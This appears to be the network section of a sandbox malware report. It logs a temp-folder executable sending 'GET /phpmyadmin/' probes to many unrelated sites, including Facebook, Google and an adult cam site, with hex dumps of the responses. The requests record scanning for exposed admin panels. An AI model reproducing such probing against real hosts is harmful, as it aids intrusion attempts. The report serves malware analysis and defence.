                                                                                                                                                                                                                                                                                                                                                                Server: WSO2 Carbon Server
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                68192.168.2.65512031.13.65.1443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC640INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_l=0; expires=Tue, 11-Mar-2025 11:14:52 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_n=0; expires=Tue, 11-Mar-2025 11:14:52 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: uiAyVLvOBUFjwR6vl2PYPW+TeOsGbTAat2zMEOGTrmZCusgwN6pTtBOzP2XT3FVS4oA1949ky4zskbgv7NO4Kg==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                69192.168.2.655156172.66.41.20443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: yellosa.co.za
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC606INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                location: http://www.yellosa.co.za/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EONG5aygV9RhdauwGihGCQnRt2jYx5RWSU3dgU0u%2BOrQsNTA7b2DGjzoM%2BYCg7oAOCisO3t3f%2FiLwx9HGHvfi%2B00FsN5RnYgvfjhqqIzys9hrvzFohS962z63xi3iuId"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb74aada452c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                70192.168.2.655237195.85.23.95443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC339OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=cgp1DhR6xTi6CSaGmMluksYz60_fzOwniweAMszarPk-1707131690-1-AchVILVUeldhU0fUL/Sm+vJu4OVXbuNx6MuETCEChl7PvBHFckvoaEMvusYEOEObJusMfqXBe2SlFcG1v+KInlY=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1145INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=30715307f3f9ac614c681529737c9a10; path=/; domain=.bongacams.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: fv=Zwx2ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: uh=FTyeK2gvLHWuqKM3Jay2MIE1sxkHFj==; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: reg_ver2=3; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                x-ua-compatible: IE=edge,chrome=1
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-reserve101-ded7160
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb74abe06740-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC224INData Raw: 31 62 39 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 2f 2f 69 2e 62 63 69 63 64 6e 2e 63 6f 6d 2f 63 73 73 2d 6d 69 6e 2f 34 74 73 35 37 2f 65 78 74 72 61 2f 64 65 70 72 65 63 61 74 65 64 5f 73 74 75 62 2e 63 73 73 22 20 64 61 74 61 2d 65 78 74 72 61 3d 22 31 22 20 2f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 6f 22 20 64 61 74 61 2d 63 73 72 66 5f 66 69 65 6c 64 3d 22 5f 63 73 72 66 5f 74 6f 6b 65 6e 22 20 64 61 74 61 2d 63 73 72 66 5f 76 61 6c 75 65 3d 22 39 37 31 31 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1b9d<link rel="stylesheet" type="text/css" media="screen" href="//i.bcicdn.com/css-min/4ts57/extra/deprecated_stub.css" data-extra="1" /><!DOCTYPE html><html lang="ro" data-csrf_field="_csrf_token" data-csrf_value="97111
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 39 39 38 39 32 62 61 36 34 64 64 33 63 30 65 65 65 66 64 34 33 63 61 63 35 32 30 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 61 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 65 78 20 6c 69 76 65 3a 20 58 58 58 20 56 69 64 65 6f 63 68 61 74 20 70 65 6e 74 72 75 20 61 64 75 6c 74 69 20 6c 69 76 65 20 2d 20 42 6f 6e 67 61 43 61 6d 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 99892ba64dd3c0eeefd43cac520"><head> <meta http-equiv="X-Ua-Compatible" content="IE=edge,chrome=1" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Sex live: XXX Videochat pentru adulti live - BongaCams</title><meta name=
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 78 2d 64 65 66 61 75 6c 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: eta name="twitter:card" content="summary_large_image" /><meta name="robots" content="index, follow" /><link rel="alternate" href="https://bongacams.com/phpmyadmin" hreflang="x-default" /><link rel="alternate" href="https://bongacams.com/phpmyadmin" hre
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 2f 2f 67 72 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 75 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 75 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 73 6b 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 6f 2e 62 6f 6e 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: //gr.bongacams.com/phpmyadmin" hreflang="el" /><link rel="alternate" href="https://hu.bongacams.com/phpmyadmin" hreflang="hu" /><link rel="alternate" href="https://sk.bongacams.com/phpmyadmin" hreflang="sk" /><link rel="alternate" href="https://ro.bong
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6e 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 69 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 75 32 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 72 75 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6b 72 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 75 6b 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="alternate" href="https://in.bongacams.com/phpmyadmin" hreflang="hi" /><link rel="alternate" href="https://ru2.bongacams.com/phpmyadmin" hreflang="ru" /><link rel="alternate" href="https://ukr.bongacams.com/phpmyadmin" hreflang="uk" /> <link rel="ico
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6d 67 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 44 6f 77 6e 6c 6f 61 64 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: k" target="_blank" rel="nofollow noopener"></a> <div class="dbs_l_img"></div> <div class="dbs_l_title"> Google Chrome </div> <div class="dbs_l_info"> Download </div> </div>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC8INData Raw: 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                71192.168.2.65549531.13.88.1443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC389INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?locale=th_TH&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: /PM00cu4eqFMSZba9J2ydQTi2PL4lmABZ0L+CgKZuuoHWu0XHStsauaCja1LzHO0qLv8vCQaYQF3MdJ7zDjWTw==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                72192.168.2.65459735.186.223.180443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sigapbanjarmasin.info
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                accept-ch: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC309INData Raw: 31 32 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 35 29 3c 2f 68 33 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 12e<html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (25)</h3>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                73192.168.2.65461854.183.63.241443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC717INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=c617b93e76f68699718ceaa19a2de8d9; expires=Mon, 04 Mar 2024 11:14:52 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=c617b93e76f68699718ceaa19a2de8d9; expires=Mon, 04 Mar 2024 11:14:52 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: WR2Gp0kA
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC15320INData Raw: 33 62 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 70 74 2d 62 72 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3bd0<!DOCTYPE html>...[if IE 8]> <html dir="ltr" lang="en-US" class="ie8"> <![endif]-->...[if IE 9]> <html dir="ltr" lang="en-US" class="ie9"> <![endif]-->...[if gt IE 9]>...><html dir="ltr" lang="pt-br"> ...<![endif]--><head>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                74192.168.2.655185142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
